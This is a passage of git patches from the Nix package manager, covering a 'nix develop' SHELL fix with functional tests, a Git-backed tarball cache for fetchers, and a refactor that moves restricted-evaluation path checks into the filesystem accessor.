-126,6 +126,7 @@ nix profile install "$flake1Dir^*" [ -e $TEST_HOME/.nix-profile/include ] printf Nix > $flake1Dir/who +nix profile list nix profile upgrade flake1 [[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello Nix" ]] [ -e $TEST_HOME/.nix-profile/share/man ] From 8c54a01df5ee59e4acf151dba8077a9842e8bdc5 Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Mon, 13 Mar 2023 21:14:19 +0100 Subject: [PATCH 005/654] nix: develop: always force SHELL to chosen shell SHELL was inherited from the system environment. This resulted in a new shell being started, but with SHELL still referring to the system shell and not the one used by nix-develop. Applications like make, use SHELL to run commands, which meant that top-level commands are run inside the nix-develop-shell, but sub-commands are ran inside the system shell. This setenv forces SHELL to always be set to the shell used by nix-develop. 
--- src/nix/develop.cc | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/src/nix/develop.cc b/src/nix/develop.cc index 38482ed42..4a561e52b 100644 --- a/src/nix/develop.cc +++ b/src/nix/develop.cc @@ -293,7 +293,6 @@ struct Common : InstallableCommand, MixProfile "NIX_LOG_FD", "NIX_REMOTE", "PPID", - "SHELL", "SHELLOPTS", "SSL_CERT_FILE", // FIXME: only want to ignore /no-cert-file.crt "TEMP", @@ -643,6 +642,10 @@ struct CmdDevelop : Common, MixEnvironment ignoreException(); } + // Override SHELL with the one chosen for this environment. + // This is to make sure the system shell doesn't leak into the build environment. + setenv("SHELL", shell.data(), 1); + // If running a phase or single command, don't want an interactive shell running after // Ctrl-C, so don't pass --rcfile auto args = phase || !command.empty() ? Strings{std::string(baseNameOf(shell)), rcFilePath} From ceab20d056a119317fb29eb0e06dfd0eb0b9d8ad Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Mon, 13 Nov 2023 22:04:34 +0100 Subject: [PATCH 006/654] nix: develop: add tests for interactive shell --- tests/functional/flakes/develop.sh | 75 ++++++++++++++++++++++++++++++ tests/functional/local.mk | 1 + 2 files changed, 76 insertions(+) create mode 100644 tests/functional/flakes/develop.sh diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh new file mode 100644 index 000000000..59f731239 --- /dev/null +++ b/tests/functional/flakes/develop.sh @@ -0,0 +1,75 @@ +source ../common.sh + +clearStore +rm -rf $TEST_HOME/.cache $TEST_HOME/.config $TEST_HOME/.local + +# Create flake under test. 
+cp ../shell-hello.nix ../config.nix $TEST_HOME/ +cat <$TEST_HOME/flake.nix +{ + inputs.nixpkgs.url = "$TEST_HOME/nixpkgs"; + outputs = {self, nixpkgs}: { + packages.$system.hello = (import ./config.nix).mkDerivation { + name = "hello"; + outputs = [ "out" "dev" ]; + meta.outputsToInstall = [ "out" ]; + buildCommand = ""; + }; + }; +} +EOF + +# Create fake nixpkgs flake. +mkdir -p $TEST_HOME/nixpkgs +cp ../config.nix ../shell.nix $TEST_HOME/nixpkgs +cat <$TEST_HOME/nixpkgs/flake.nix +{ + outputs = {self}: { + legacyPackages.$system.bashInteractive = (import ./shell.nix {}).bashInteractive; + }; +} +EOF + +cd $TEST_HOME + +# Test whether `nix develop` passes through environment variables. +[[ "$( + ENVVAR=a nix develop --no-write-lock-file .#hello < Date: Thu, 16 Nov 2023 15:12:31 +0100 Subject: [PATCH 007/654] fixup! nix: develop: add tests for interactive shell --- tests/functional/common/vars-and-functions.sh.in | 1 + tests/functional/flakes/develop.sh | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/tests/functional/common/vars-and-functions.sh.in b/tests/functional/common/vars-and-functions.sh.in index 848988af9..02773bf60 100644 --- a/tests/functional/common/vars-and-functions.sh.in +++ b/tests/functional/common/vars-and-functions.sh.in @@ -45,6 +45,7 @@ if [[ -n "${NIX_DAEMON_PACKAGE:-}" ]]; then DAEMON_PATH="${NIX_DAEMON_PACKAGE}/bin:$DAEMON_PATH" fi coreutils=@coreutils@ +lsof=@lsof@ export dot=@dot@ export SHELL="@bash@" diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh index 59f731239..db23ca0c0 100644 --- a/tests/functional/flakes/develop.sh +++ b/tests/functional/flakes/develop.sh @@ -54,7 +54,7 @@ BASH_INTERACTIVE_EXECUTABLE="$PWD/bash-interactive/bin/bash" [[ "$( nix develop --no-write-lock-file .#hello <&1 | grep -o '/.*/bash' EOF )" -ef "$BASH_INTERACTIVE_EXECUTABLE" ]] From 06a745120bc8fe7625954e970c61028f8a42c31e Mon Sep 17 00:00:00 2001 From: Bob van der Linden Date: Sun, 26 Nov 2023 21:27:46 
+0100 Subject: [PATCH 008/654] nix: develop: remove test for interactive shell executable --- tests/functional/flakes/develop.sh | 8 -------- 1 file changed, 8 deletions(-) diff --git a/tests/functional/flakes/develop.sh b/tests/functional/flakes/develop.sh index db23ca0c0..e1e53d364 100644 --- a/tests/functional/flakes/develop.sh +++ b/tests/functional/flakes/develop.sh @@ -50,14 +50,6 @@ EOF nix build --no-write-lock-file './nixpkgs#bashInteractive' --out-link ./bash-interactive BASH_INTERACTIVE_EXECUTABLE="$PWD/bash-interactive/bin/bash" -# Test whether `nix develop` uses nixpkgs#bashInteractive shell. -[[ "$( - nix develop --no-write-lock-file .#hello <&1 | grep -o '/.*/bash' -EOF -)" -ef "$BASH_INTERACTIVE_EXECUTABLE" ]] - # Test whether `nix develop` sets `SHELL` to nixpkgs#bashInteractive shell. [[ "$( SHELL=custom nix develop --no-write-lock-file .#hello < Date: Wed, 29 Nov 2023 12:35:08 +0100 Subject: [PATCH 009/654] Add a Git-based content-addressed tarball cache GitArchiveInputScheme now streams tarballs into a Git repository. This deduplicates data a lot, e.g. when you're fetching different revisions of the Nixpkgs repo. It also warns if the tree hash returned by GitHub doesn't match the tree hash of the imported tarball. 
--- src/libfetchers/attrs.cc | 5 + src/libfetchers/attrs.hh | 2 + src/libfetchers/git-utils.cc | 178 +++++++++++++++++++++++++++++++++++ src/libfetchers/git-utils.hh | 10 ++ src/libfetchers/github.cc | 114 ++++++++++++++-------- 5 files changed, 272 insertions(+), 37 deletions(-) diff --git a/src/libfetchers/attrs.cc b/src/libfetchers/attrs.cc index a565d19d4..e3fa1d26a 100644 --- a/src/libfetchers/attrs.cc +++ b/src/libfetchers/attrs.cc @@ -104,4 +104,9 @@ std::map attrsToQuery(const Attrs & attrs) return query; } +Hash getRevAttr(const Attrs & attrs, const std::string & name) +{ + return Hash::parseAny(getStrAttr(attrs, name), htSHA1); +} + } diff --git a/src/libfetchers/attrs.hh b/src/libfetchers/attrs.hh index b9a2c824e..97a74bce0 100644 --- a/src/libfetchers/attrs.hh +++ b/src/libfetchers/attrs.hh @@ -39,4 +39,6 @@ bool getBoolAttr(const Attrs & attrs, const std::string & name); std::map attrsToQuery(const Attrs & attrs); +Hash getRevAttr(const Attrs & attrs, const std::string & name); + } diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 19eae0e1d..abad42c29 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -4,6 +4,7 @@ #include "finally.hh" #include "processes.hh" #include "signals.hh" +#include "users.hh" #include @@ -21,6 +22,9 @@ #include #include +#include "tarfile.hh" +#include + #include #include #include @@ -307,6 +311,158 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return std::nullopt; } + TarballInfo importTarball(Source & source) override + { + TarArchive archive(source); + + struct PendingDir + { + std::string name; + TreeBuilder builder; + }; + + std::vector pendingDirs; + + auto pushBuilder = [&](std::string name) + { + git_treebuilder * b; + if (git_treebuilder_new(&b, *this, nullptr)) + throw Error("creating a tree builder: %s", git_error_last()->message); + pendingDirs.push_back({ .name = std::move(name), .builder = TreeBuilder(b) }); + }; + + auto popBuilder = [&]() 
-> std::pair + { + assert(!pendingDirs.empty()); + auto pending = std::move(pendingDirs.back()); + git_oid oid; + if (git_treebuilder_write(&oid, pending.builder.get())) + throw Error("creating a tree object: %s", git_error_last()->message); + pendingDirs.pop_back(); + return {oid, pending.name}; + }; + + auto addToTree = [&](const std::string & name, const git_oid & oid, git_filemode_t mode) + { + assert(!pendingDirs.empty()); + auto & pending = pendingDirs.back(); + if (git_treebuilder_insert(nullptr, pending.builder.get(), name.c_str(), &oid, mode)) + throw Error("adding a file to a tree builder: %s", git_error_last()->message); + }; + + auto updateBuilders = [&](boost::span names) + { + // Find the common prefix of pendingDirs and names. + size_t prefixLen = 0; + for (; prefixLen < names.size() && prefixLen + 1 < pendingDirs.size(); ++prefixLen) + if (names[prefixLen] != pendingDirs[prefixLen + 1].name) + break; + + // Finish the builders that are not part of the common prefix. + for (auto n = pendingDirs.size(); n > prefixLen + 1; --n) { + auto [oid, name] = popBuilder(); + addToTree(name, oid, GIT_FILEMODE_TREE); + } + + // Create builders for the new directories. 
+ for (auto n = prefixLen; n < names.size(); ++n) + pushBuilder(names[n]); + }; + + pushBuilder(""); + + size_t componentsToStrip = 1; + + time_t lastModified = 0; + + for (;;) { + // FIXME: merge with extract_archive + struct archive_entry * entry; + int r = archive_read_next_header(archive.archive, &entry); + if (r == ARCHIVE_EOF) break; + auto path = archive_entry_pathname(entry); + if (!path) + throw Error("cannot get archive member name: %s", archive_error_string(archive.archive)); + if (r == ARCHIVE_WARN) + warn(archive_error_string(archive.archive)); + else + archive.check(r); + + lastModified = std::max(lastModified, archive_entry_mtime(entry)); + + auto pathComponents = tokenizeString>(path, "/"); + + boost::span pathComponents2{pathComponents}; + + if (pathComponents2.size() <= componentsToStrip) continue; + pathComponents2 = pathComponents2.subspan(componentsToStrip); + + updateBuilders( + archive_entry_filetype(entry) == AE_IFDIR + ? pathComponents2 + : pathComponents2.first(pathComponents2.size() - 1)); + + switch (archive_entry_filetype(entry)) { + + case AE_IFDIR: + // Nothing to do right now. + break; + + case AE_IFREG: { + + git_writestream * stream = nullptr; + if (git_blob_create_from_stream(&stream, *this, nullptr)) + throw Error("creating a blob stream object: %s", git_error_last()->message); + + while (true) { + std::vector buf(128 * 1024); + auto n = archive_read_data(archive.archive, buf.data(), buf.size()); + if (n < 0) + throw Error("cannot read file '%s' from tarball", path); + if (n == 0) break; + if (stream->write(stream, (const char *) buf.data(), n)) + throw Error("writing a blob for tarball member '%s': %s", path, git_error_last()->message); + } + + git_oid oid; + if (git_blob_create_from_stream_commit(&oid, stream)) + throw Error("creating a blob object for tarball member '%s': %s", path, git_error_last()->message); + + addToTree(*pathComponents.rbegin(), oid, + archive_entry_mode(entry) & S_IXUSR + ? 
GIT_FILEMODE_BLOB_EXECUTABLE + : GIT_FILEMODE_BLOB); + + break; + } + + case AE_IFLNK: { + auto target = archive_entry_symlink(entry); + + git_oid oid; + if (git_blob_create_from_buffer(&oid, *this, target, strlen(target))) + throw Error("creating a blob object for tarball symlink member '%s': %s", path, git_error_last()->message); + + addToTree(*pathComponents.rbegin(), oid, GIT_FILEMODE_LINK); + + break; + } + + default: + throw Error("file '%s' in tarball has unsupported file type", path); + } + } + + updateBuilders({}); + + auto [oid, _name] = popBuilder(); + + return TarballInfo { + .treeHash = toHash(oid), + .lastModified = lastModified + }; + } + std::vector> getSubmodules(const Hash & rev) override; std::string resolveSubmoduleUrl( @@ -449,6 +605,22 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this else throw Error("Commit signature verification on commit %s failed: %s", rev.gitRev(), output); } + + Hash treeHashToNarHash(const Hash & treeHash) override + { + auto accessor = getAccessor(treeHash); + + fetchers::Attrs cacheKey({{"_what", "treeHashToNarHash"}, {"treeHash", treeHash.gitRev()}}); + + if (auto res = fetchers::getCache()->lookup(cacheKey)) + return Hash::parseAny(fetchers::getStrAttr(*res, "narHash"), htSHA256); + + auto narHash = accessor->hashPath(CanonPath::root); + + fetchers::getCache()->upsert(cacheKey, fetchers::Attrs({{"narHash", narHash.to_string(HashFormat::SRI, true)}})); + + return narHash; + } }; ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) @@ -673,5 +845,11 @@ std::vector> GitRepoImpl::getSubmodules return result; } +ref getTarballCache() +{ + static CanonPath repoDir(getCacheDir() + "/nix/tarball-cache"); + + return make_ref(repoDir, true, true); +} } diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 1def82071..b8b31530a 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -69,6 +69,8 @@ struct GitRepo time_t lastModified; }; + virtual 
TarballInfo importTarball(Source & source) = 0; + virtual bool hasObject(const Hash & oid) = 0; virtual ref getAccessor(const Hash & rev) = 0; @@ -85,6 +87,14 @@ struct GitRepo virtual void verifyCommit( const Hash & rev, const std::vector & publicKeys) = 0; + + /** + * Given a Git tree hash, compute the hash of its NAR + * serialisation. This is memoised on-disk. + */ + virtual Hash treeHashToNarHash(const Hash & treeHash) = 0; }; +ref getTarballCache(); + } diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc index 661ad4884..877f6378b 100644 --- a/src/libfetchers/github.cc +++ b/src/libfetchers/github.cc @@ -8,6 +8,7 @@ #include "fetchers.hh" #include "fetch-settings.hh" #include "tarball.hh" +#include "git-utils.hh" #include #include @@ -180,49 +181,87 @@ struct GitArchiveInputScheme : InputScheme return headers; } - virtual Hash getRevFromRef(nix::ref store, const Input & input) const = 0; + struct RefInfo + { + Hash rev; + std::optional treeHash; + }; + + virtual RefInfo getRevFromRef(nix::ref store, const Input & input) const = 0; virtual DownloadUrl getDownloadUrl(const Input & input) const = 0; - std::pair fetch(ref store, const Input & _input) override + std::pair downloadArchive(ref store, Input input) const { - Input input(_input); - if (!maybeGetStrAttr(input.attrs, "ref")) input.attrs.insert_or_assign("ref", "HEAD"); + std::optional upstreamTreeHash; + auto rev = input.getRev(); - if (!rev) rev = getRevFromRef(store, input); + if (!rev) { + auto refInfo = getRevFromRef(store, input); + rev = refInfo.rev; + upstreamTreeHash = refInfo.treeHash; + debug("HEAD revision for '%s' is %s", input.to_string(), refInfo.rev.gitRev()); + } input.attrs.erase("ref"); input.attrs.insert_or_assign("rev", rev->gitRev()); - Attrs lockedAttrs({ - {"type", "git-tarball"}, - {"rev", rev->gitRev()}, - }); + auto cache = getCache(); - if (auto res = getCache()->lookup(store, lockedAttrs)) { - input.attrs.insert_or_assign("lastModified", getIntAttr(res->first, 
"lastModified")); - return {std::move(res->second), input}; + Attrs treeHashKey{{"_what", "gitRevToTreeHash"}, {"rev", rev->gitRev()}}; + Attrs lastModifiedKey{{"_what", "gitRevToLastModified"}, {"rev", rev->gitRev()}}; + + if (auto treeHashAttrs = cache->lookup(treeHashKey)) { + if (auto lastModifiedAttrs = cache->lookup(lastModifiedKey)) { + auto treeHash = getRevAttr(*treeHashAttrs, "treeHash"); + auto lastModified = getIntAttr(*lastModifiedAttrs, "lastModified"); + if (getTarballCache()->hasObject(treeHash)) + return {std::move(input), GitRepo::TarballInfo { .treeHash = treeHash, .lastModified = (time_t) lastModified }}; + else + debug("Git tree with hash '%s' has disappeared from the cache, refetching...", treeHash.gitRev()); + } } + /* Stream the tarball into the tarball cache. */ auto url = getDownloadUrl(input); - auto result = downloadTarball(store, url.url, input.getName(), true, url.headers); + auto source = sinkToSource([&](Sink & sink) { + FileTransferRequest req(url.url); + req.headers = url.headers; + getFileTransfer()->download(std::move(req), sink); + }); - input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified)); + auto tarballInfo = getTarballCache()->importTarball(*source); - getCache()->add( - store, - lockedAttrs, - { - {"rev", rev->gitRev()}, - {"lastModified", uint64_t(result.lastModified)} - }, - result.storePath, - true); + cache->upsert(treeHashKey, Attrs{{"treeHash", tarballInfo.treeHash.gitRev()}}); + cache->upsert(lastModifiedKey, Attrs{{"lastModified", (uint64_t) tarballInfo.lastModified}}); - return {result.storePath, input}; + if (upstreamTreeHash != tarballInfo.treeHash) + warn( + "Git tree hash mismatch for revision '%s' of '%s': " + "expected '%s', got '%s'. 
" + "This can happen if the Git repository uses submodules.", + rev->gitRev(), input.to_string(), upstreamTreeHash->gitRev(), tarballInfo.treeHash.gitRev()); + + return {std::move(input), tarballInfo}; + } + + std::pair, Input> getAccessor(ref store, const Input & _input) const override + { + auto [input, tarballInfo] = downloadArchive(store, _input); + + input.attrs.insert_or_assign("treeHash", tarballInfo.treeHash.gitRev()); + input.attrs.insert_or_assign("lastModified", uint64_t(tarballInfo.lastModified)); + + auto accessor = getTarballCache()->getAccessor(tarballInfo.treeHash); + + accessor->setPathDisplay("«" + input.to_string() + "»"); + + accessor->fingerprint = input.getFingerprint(store); + + return {accessor, input}; } std::optional experimentalFeature() const override @@ -269,7 +308,7 @@ struct GitHubInputScheme : GitArchiveInputScheme return getStrAttr(input.attrs, "repo"); } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { auto host = getHost(input); auto url = fmt( @@ -284,9 +323,10 @@ struct GitHubInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string { json["sha"] }, htSHA1); - debug("HEAD revision for '%s' is %s", url, rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(std::string { json["sha"] }, htSHA1), + .treeHash = Hash::parseAny(std::string { json["commit"]["tree"]["sha"] }, htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override @@ -343,7 +383,7 @@ struct GitLabInputScheme : GitArchiveInputScheme return std::make_pair(token.substr(0,fldsplit), token.substr(fldsplit+1)); } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { auto host = maybeGetStrAttr(input.attrs, 
"host").value_or("gitlab.com"); // See rate limiting note below @@ -356,9 +396,9 @@ struct GitLabInputScheme : GitArchiveInputScheme readFile( store->toRealPath( downloadFile(store, url, "source", false, headers).storePath))); - auto rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1); - debug("HEAD revision for '%s' is %s", url, rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(std::string(json[0]["id"]), htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override @@ -402,7 +442,7 @@ struct SourceHutInputScheme : GitArchiveInputScheme // Once it is implemented, however, should work as expected. } - Hash getRevFromRef(nix::ref store, const Input & input) const override + RefInfo getRevFromRef(nix::ref store, const Input & input) const override { // TODO: In the future, when the sourcehut graphql API is implemented for mercurial // and with anonymous access, this method should use it instead. @@ -445,12 +485,12 @@ struct SourceHutInputScheme : GitArchiveInputScheme id = parsedLine->target; } - if(!id) + if (!id) throw BadURL("in '%d', couldn't find ref '%d'", input.to_string(), ref); - auto rev = Hash::parseAny(*id, htSHA1); - debug("HEAD revision for '%s' is %s", fmt("%s/%s", base_url, ref), rev.gitRev()); - return rev; + return RefInfo { + .rev = Hash::parseAny(*id, htSHA1) + }; } DownloadUrl getDownloadUrl(const Input & input) const override From 043413bb597760eefb983395a10141643db9ee8c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Wed, 29 Nov 2023 12:38:46 +0100 Subject: [PATCH 010/654] boost::span -> std::span --- src/libfetchers/git-utils.cc | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index abad42c29..2324fd9ee 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -6,8 +6,6 @@ #include "signals.hh" #include "users.hh" -#include - #include #include #include @@ -28,6 +26,7 @@ #include #include 
#include +#include namespace std { @@ -350,7 +349,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this throw Error("adding a file to a tree builder: %s", git_error_last()->message); }; - auto updateBuilders = [&](boost::span names) + auto updateBuilders = [&](std::span names) { // Find the common prefix of pendingDirs and names. size_t prefixLen = 0; @@ -392,7 +391,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this auto pathComponents = tokenizeString>(path, "/"); - boost::span pathComponents2{pathComponents}; + std::span pathComponents2{pathComponents}; if (pathComponents2.size() <= componentsToStrip) continue; pathComponents2 = pathComponents2.subspan(componentsToStrip); From ea95327e72f5781295417b0eae46a5e351bebebd Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Thu, 30 Nov 2023 16:16:17 +0100 Subject: [PATCH 011/654] Move restricted/pure-eval access control out of the evaluator and into the accessor --- src/libcmd/installables.cc | 7 +- src/libexpr/eval.cc | 103 +++++---------------- src/libexpr/eval.hh | 25 +++--- src/libexpr/parser.y | 19 +++- src/libexpr/primops.cc | 119 +++++++++++-------------- src/nix-build/nix-build.cc | 7 +- src/nix-instantiate/nix-instantiate.cc | 2 +- tests/functional/restricted.sh | 4 +- 8 files changed, 115 insertions(+), 171 deletions(-) diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 6e670efea..6b3c82374 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -260,9 +260,10 @@ void SourceExprCommand::completeInstallable(AddCompletions & completions, std::s evalSettings.pureEval = false; auto state = getEvalState(); - Expr *e = state->parseExprFromFile( - resolveExprPath(state->checkSourcePath(lookupFileArg(*state, *file))) - ); + auto e = + state->parseExprFromFile( + resolveExprPath( + lookupFileArg(*state, *file))); Value root; state->eval(e, root); diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 7e68e6f9b..23ac349fe 100644 --- 
a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -509,7 +509,18 @@ EvalState::EvalState( , sOutputSpecified(symbols.create("outputSpecified")) , repair(NoRepair) , emptyBindings(0) - , rootFS(makeFSInputAccessor(CanonPath::root)) + , rootFS( + makeFSInputAccessor( + CanonPath::root, + evalSettings.restrictEval || evalSettings.pureEval + ? std::optional>(std::set()) + : std::nullopt, + [](const CanonPath & path) -> RestrictedPathError { + auto modeInformation = evalSettings.pureEval + ? "in pure evaluation mode (use '--impure' to override)" + : "in restricted mode"; + throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); + })) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -551,28 +562,10 @@ EvalState::EvalState( searchPath.elements.emplace_back(SearchPath::Elem::parse(i)); } - if (evalSettings.restrictEval || evalSettings.pureEval) { - allowedPaths = PathSet(); - - for (auto & i : searchPath.elements) { - auto r = resolveSearchPathPath(i.path); - if (!r) continue; - - auto path = std::move(*r); - - if (store->isInStore(path)) { - try { - StorePathSet closure; - store->computeFSClosure(store->toStorePath(path).first, closure); - for (auto & path : closure) - allowPath(path); - } catch (InvalidPath &) { - allowPath(path); - } - } else - allowPath(path); - } - } + /* Allow access to all paths in the search path. 
*/ + if (rootFS->hasAccessControl()) + for (auto & i : searchPath.elements) + resolveSearchPathPath(i.path, true); corepkgsFS->addFile( CanonPath("fetchurl.nix"), @@ -590,14 +583,12 @@ EvalState::~EvalState() void EvalState::allowPath(const Path & path) { - if (allowedPaths) - allowedPaths->insert(path); + rootFS->allowPath(CanonPath(path)); } void EvalState::allowPath(const StorePath & storePath) { - if (allowedPaths) - allowedPaths->insert(store->toRealPath(storePath)); + rootFS->allowPath(CanonPath(store->toRealPath(storePath))); } void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & v) @@ -607,54 +598,6 @@ void EvalState::allowAndSetStorePathString(const StorePath & storePath, Value & mkStorePathString(storePath, v); } -SourcePath EvalState::checkSourcePath(const SourcePath & path_) -{ - // Don't check non-rootFS accessors, they're in a different namespace. - if (path_.accessor != ref(rootFS)) return path_; - - if (!allowedPaths) return path_; - - auto i = resolvedPaths.find(path_.path.abs()); - if (i != resolvedPaths.end()) - return i->second; - - bool found = false; - - /* First canonicalize the path without symlinks, so we make sure an - * attacker can't append ../../... to a path that would be in allowedPaths - * and thus leak symlink targets. - */ - Path abspath = canonPath(path_.path.abs()); - - for (auto & i : *allowedPaths) { - if (isDirOrInDir(abspath, i)) { - found = true; - break; - } - } - - if (!found) { - auto modeInformation = evalSettings.pureEval - ? "in pure eval mode (use '--impure' to override)" - : "in restricted mode"; - throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", abspath, modeInformation); - } - - /* Resolve symlinks. 
*/ - debug("checking access to '%s'", abspath); - SourcePath path = rootPath(CanonPath(canonPath(abspath, true))); - - for (auto & i : *allowedPaths) { - if (isDirOrInDir(path.path.abs(), i)) { - resolvedPaths.insert_or_assign(path_.path.abs(), path); - return path; - } - } - - throw RestrictedPathError("access to canonical path '%1%' is forbidden in restricted mode", path); -} - - void EvalState::checkURI(const std::string & uri) { if (!evalSettings.restrictEval) return; @@ -674,12 +617,12 @@ void EvalState::checkURI(const std::string & uri) /* If the URI is a path, then check it against allowedPaths as well. */ if (hasPrefix(uri, "/")) { - checkSourcePath(rootPath(CanonPath(uri))); + rootFS->checkAllowed(CanonPath(uri)); return; } if (hasPrefix(uri, "file://")) { - checkSourcePath(rootPath(CanonPath(std::string(uri, 7)))); + rootFS->checkAllowed(CanonPath(uri.substr(7))); return; } @@ -1181,10 +1124,8 @@ Value * ExprPath::maybeThunk(EvalState & state, Env & env) } -void EvalState::evalFile(const SourcePath & path_, Value & v, bool mustBeTrivial) +void EvalState::evalFile(const SourcePath & path, Value & v, bool mustBeTrivial) { - auto path = checkSourcePath(path_); - FileEvalCache::iterator i; if ((i = fileEvalCache.find(path)) != fileEvalCache.end()) { v = i->second; @@ -1205,7 +1146,7 @@ void EvalState::evalFile(const SourcePath & path_, Value & v, bool mustBeTrivial e = j->second; if (!e) - e = parseExprFromFile(checkSourcePath(resolvedPath)); + e = parseExprFromFile(resolvedPath); fileParseCache[resolvedPath] = e; diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 9a92992c1..ee7bdda0d 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -217,12 +217,6 @@ public: */ RepairFlag repair; - /** - * The allowed filesystem paths in restricted or pure evaluation - * mode. 
- */ - std::optional allowedPaths; - Bindings emptyBindings; /** @@ -396,12 +390,6 @@ public: */ void allowAndSetStorePathString(const StorePath & storePath, Value & v); - /** - * Check whether access to a path is allowed and throw an error if - * not. Otherwise return the canonicalised path. - */ - SourcePath checkSourcePath(const SourcePath & path); - void checkURI(const std::string & uri); /** @@ -445,13 +433,15 @@ public: SourcePath findFile(const SearchPath & searchPath, const std::string_view path, const PosIdx pos = noPos); /** - * Try to resolve a search path value (not the optional key part) + * Try to resolve a search path value (not the optional key part). * * If the specified search path element is a URI, download it. * * If it is not found, return `std::nullopt` */ - std::optional resolveSearchPathPath(const SearchPath::Path & path); + std::optional resolveSearchPathPath( + const SearchPath::Path & elem, + bool initAccessControl = false); /** * Evaluate an expression to normal form @@ -756,6 +746,13 @@ public: */ [[nodiscard]] StringMap realiseContext(const NixStringContext & context); + /* Call the binary path filter predicate used builtins.path etc. 
*/ + bool callPathFilter( + Value * filterFun, + const SourcePath & path, + std::string_view pathArg, + PosIdx pos); + private: /** diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index f6cf1f689..58fc580fc 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -783,7 +783,7 @@ SourcePath EvalState::findFile(const SearchPath & searchPath, const std::string_ } -std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0) +std::optional EvalState::resolveSearchPathPath(const SearchPath::Path & value0, bool initAccessControl) { auto & value = value0.s; auto i = searchPathResolved.find(value); @@ -800,7 +800,6 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa logWarning({ .msg = hintfmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value) }); - res = std::nullopt; } } @@ -814,6 +813,20 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa else { auto path = absPath(value); + + /* Allow access to paths in the search path. 
*/ + if (initAccessControl) { + allowPath(path); + if (store->isInStore(path)) { + try { + StorePathSet closure; + store->computeFSClosure(store->toStorePath(path).first, closure); + for (auto & p : closure) + allowPath(p); + } catch (InvalidPath &) { } + } + } + if (pathExists(path)) res = { path }; else { @@ -829,7 +842,7 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa else debug("failed to resolve search path element '%s'", value); - searchPathResolved[value] = res; + searchPathResolved.emplace(value, res); return res; } diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index ebf2549e4..0f7706563 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -15,6 +15,7 @@ #include "value-to-json.hh" #include "value-to-xml.hh" #include "primops.hh" +#include "fs-input-accessor.hh" #include #include @@ -90,8 +91,8 @@ StringMap EvalState::realiseContext(const NixStringContext & context) for (auto & [outputName, outputPath] : outputs) { /* Add the output of this derivations to the allowed paths. 
*/ - if (allowedPaths) { - allowPath(outputPath); + if (rootFS->hasAccessControl()) { + allowPath(store->toRealPath(outputPath)); } /* Get all the output paths corresponding to the placeholders we had */ if (experimentalFeatureSettings.isEnabled(Xp::CaDerivations)) { @@ -110,27 +111,19 @@ StringMap EvalState::realiseContext(const NixStringContext & context) return res; } -struct RealisePathFlags { - // Whether to check that the path is allowed in pure eval mode - bool checkForPureEval = true; -}; - -static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v, const RealisePathFlags flags = {}) +static SourcePath realisePath(EvalState & state, const PosIdx pos, Value & v) { NixStringContext context; auto path = state.coerceToPath(noPos, v, context, "while realising the context of a path"); try { - if (!context.empty()) { + if (!context.empty() && path.accessor == state.rootFS) { auto rewrites = state.realiseContext(context); auto realPath = state.toRealPath(rewriteStrings(path.path.abs(), rewrites), context); return {path.accessor, CanonPath(realPath)}; - } - - return flags.checkForPureEval - ? state.checkSourcePath(path) - : path; + } else + return path; } catch (Error & e) { e.addTrace(state.positions[pos], "while realising the context of path '%s'", 